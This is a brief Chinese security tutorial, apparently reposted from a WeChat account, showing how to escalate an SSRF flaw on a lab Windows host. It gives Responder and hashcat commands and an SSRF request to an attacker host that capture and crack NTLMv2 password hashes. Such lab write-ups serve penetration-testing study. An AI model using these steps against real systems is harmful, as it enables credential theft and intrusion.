01—SSRF的利用姿势
SSRF这个常见的服务端请求伪造攻击在挖SRC的时候常常会见到,但是一般都是低危或者中危,如何扩大战果?下面演示一下如何通过SSRF突破边界:
实验靶机:windows主机+含有ssrf的web站点
当我们可以通过ssrf来读取我们远程服务器上面的文件时:
我们可以通过responder这个工具来抓取http的流量,截获windows上面的ntlmV2的hash,这样在通过爆破获取windows主机的密码:
responder
-I tap0 -wv
#tap0指网卡
网页上访问:
http://192.168.x.x:8080/?url=http://192.168.x.x:80/reverse_shell.py
成功拿到hash,拿去爆破:
hashcat -m 5600
hash
/usr/share/wordlists/rockyou.txt --force
这样就可以拿到账户和密码突破边界!
原文始发于微信公众号(道玄网安驿站):SSRF如何突破边界?
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论